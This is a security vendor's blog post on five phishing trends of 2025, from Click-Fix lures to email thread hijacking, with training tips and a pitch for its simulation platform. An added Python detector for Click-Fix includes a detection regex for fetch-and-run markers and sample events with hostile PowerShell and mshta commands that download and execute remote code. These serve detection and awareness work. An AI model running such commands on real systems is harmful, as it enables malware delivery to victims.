Top 5 Human‑Factor Cybersecurity Threats of 2025: Phishing Evolves Again
Cybersecurity threats in 2025 have taken a new shape—targeting people, not just systems. Phishing-based attacks are more convincing, more personalized, and harder to detect. This post explores the top five human-factor cybersecurity threats this year, and how training and testing can help you stay ahead.

1. Click-Fix Attacks: A New Type of Cybersecurity Threat
Click-Fix attacks are on the rise. These phishing attempts use fake pop-ups or system alerts, asking users to paste a “fix” into Terminal or Run. What looks like a helpful command actually launches malware.
Attackers are using these tactics in phishing emails, browser redirects, and chat support scams. Some campaigns have also been linked to nation-state actors.
Defend against it:
- Simulate Click-Fix phishing in employee training. We have a new attack template to do this for you.
- Warn staff not to copy-paste from unknown sources.
- Monitor for clipboard activity linked to scripts.
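As an added example (not from the original post), the following Python checks process-creation events for the Click-Fix pattern described above: a script host launched from the Run dialog or an interactive console with a command line that fetches remote content or hides its window. The event format, the field names (modelled on Sysmon Event ID 1), the URLs and all sample events are constructed for this illustration.

```python
import re

# Script hosts that paste-a-fix lures typically invoke.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Parents meaning a person typed or pasted the command (Run dialog = explorer.exe,
# or an interactive console); service-launched scripts are excluded to cut false positives.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
# Markers of fetch-and-run or deliberately hidden execution.
SUSPICIOUS = re.compile(
    r"https?://|-enc\w*\s|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression"
    r"|downloadstring|\bcurl\s|bitsadmin", re.IGNORECASE)

def parse_event(line):
    """Parse one 'key=value|key=value' event (constructed format) into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def is_clickfix(event):
    """True when a script host starts interactively with a suspicious command line."""
    return (basename(event.get("Image", "")) in SCRIPT_HOSTS
            and basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS
            and SUSPICIOUS.search(event.get("CommandLine", "")) is not None)

def detect(lines):
    """Return the ProcessIds of events matching the Click-Fix pattern."""
    return [e["ProcessId"] for e in map(parse_event, lines) if is_clickfix(e)]

# Constructed sample events; field names modelled on Sysmon Event ID 1.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Pasted into Run: hidden window, fetch-and-execute -> flagged
    r"ProcessId=4120|Image=" + PS + r"|ParentImage=C:\Windows\explorer.exe"
    r'|CommandLine=powershell -w hidden -c "iex (irm https://fix.example.invalid/repair)"',
    # mshta pointed at a remote HTA from the Run dialog -> flagged
    r"ProcessId=4188|Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=mshta https://fix.example.invalid/verify.hta",
    # Scheduled inventory script: URL present but not user-launched -> clean
    r"ProcessId=5012|Image=" + PS + r"|ParentImage=C:\Windows\System32\svchost.exe"
    r"|CommandLine=powershell -File C:\Scripts\inventory.ps1 -Server https://cmdb.corp.example",
    # Plain PowerShell console opened from Run -> clean
    r"ProcessId=5230|Image=" + PS + r"|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell -NoLogo",
]

if __name__ == "__main__":
    print("Click-Fix candidates:", detect(SAMPLE_EVENTS))  # ['4120', '4188']
```

The Run dialog also keeps what the user typed under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is a useful corroborating artifact when triaging a hit.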
2. Supplier Phishing: The Hidden Cybersecurity Threat in Your Inbox
Supplier phishing is one of the most dangerous cybersecurity threats right now. Attackers hijack a trusted supplier’s email account and send malicious messages to internal staff. Because the email is real and the relationship is trusted, users are more likely to click.
In May 2025, a supplier phishing attack on the major UK retailer M&S caused substantial financial losses and exposed weaknesses in vendor controls.
Mitigation tips:
- Include vendor-style phishing in awareness simulations.
- Extend training to partners and outsourced teams. We can help you deliver this.
- Verify requests through a second communication channel.
3. QR Code Phishing: Scan and Click to Get Hacked
QR codes are everywhere—from desks to meeting invites. But in 2025, phishing attacks using QR codes are increasing. These codes often lead to fake login pages or token-harvesting scripts.
Because the action starts on a smartphone, employees are less cautious. ENISA has flagged QR phishing as one of the top emerging cybersecurity threats in Europe.
Protect your people:
- Use QR phishing in your awareness testing.
- Teach staff to check URLs before logging in.
- Post visual guidance in offices near shared spaces.
We have already covered QR codes on our blog, and we have the attack and awareness templates to help you address this.

4. MFA Fatigue: When Too Many Prompts Lead to One Wrong Click
Phishing attackers now exploit users through MFA fatigue. After stealing credentials, they trigger repeated login requests, hoping the user will approve one by mistake.
This tactic is especially common after work hours or on mobile devices. It was used in several high-profile attacks in 2024 and continues to grow.
What to do:
- Train users on how MFA bombing works.
- Simulate these attacks in your phishing tests.
- Upgrade to phishing-resistant MFA where possible.
5. Email Thread Hijacking: Trusted Conversations Turned Risky
In a thread hijack, the attacker uses a real compromised account to reply to an active email conversation. It’s highly effective—because the message includes genuine email history and tone.
These phishing attacks are often aimed at finance, legal, and HR teams. They bypass filters and psychological defenses.
Defensive steps:
- Include thread hijacking scenarios in simulations.
- Train users to spot unusual attachments—even in trusted threads.
- Encourage quick internal reporting for suspicious replies.
Cybersecurity Threats and Compliance: Why Training Is Now a Legal Priority
The European NIS2 Directive makes it clear: cybersecurity awareness is no longer optional. If your organization is in critical or important sectors, NIS2 requires:
- Regular employee training
- Simulated attacks to test response
- Reporting and response workflows
Fines for non-compliance can reach up to €10 million or 2% of global turnover.
Organizations in Germany, Austria, and other EU countries must now prove they are taking human risk seriously. Implementing realistic phishing training and testing—as offered by platforms like Lucy—is a key part of meeting these obligations.
Final Thoughts: Cybersecurity Threats Will Continue to Evolve, So Train, Test, and Stay Ahead
The biggest cybersecurity threats of 2025 are not zero-day exploits—they’re clever, human-focused phishing techniques. And they’re working.
That’s why your defense plan should include:
- Realistic phishing simulations based on current threats
- Role-based awareness training, tailored by department
- Continuous testing, especially for third-party risk
Tools like Lucy Security let you run targeted phishing tests, customize content, and track improvement over time.
It’s no longer just about catching the phish. It’s about proving you can.
Contact us if you want to discuss these challenges and your needs further.
Our YouTube channel also provides many helpful videos on these topics, including how to clone attacks.